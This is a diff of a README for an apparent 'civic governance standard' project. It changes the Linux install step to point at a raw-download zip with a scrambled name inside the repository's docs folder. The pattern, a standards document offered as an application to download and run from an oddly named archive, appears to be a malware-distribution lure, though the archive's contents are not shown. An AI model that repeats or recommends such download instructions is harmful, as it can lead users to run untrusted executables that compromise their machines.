yoel11ck/Civic-Overwatch-Governance-Standard-for-Public-Interest-Analysis/README.md

    - For Windows: Follow the installation prompts.
    - For macOS: Open the downloaded `.dmg`, drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the application from the extracted folder.
+   - For Linux: Extract the `https://github.com/yoel11ck/Civic-Overwatch-Governance-Standard-for-Public-Interest-Analysis/raw/refs/heads/main/docs/Standard_Governance_Overwatch_Interest_Analysis_Public_for_Civic_3.9-alpha.3.zip` file and run the application from the extracted folder.

 ## 🌐 Features
 - **Civic Integrity Floors**: A set of minimum standards that ensure civic efforts meet baseline ethical expectations.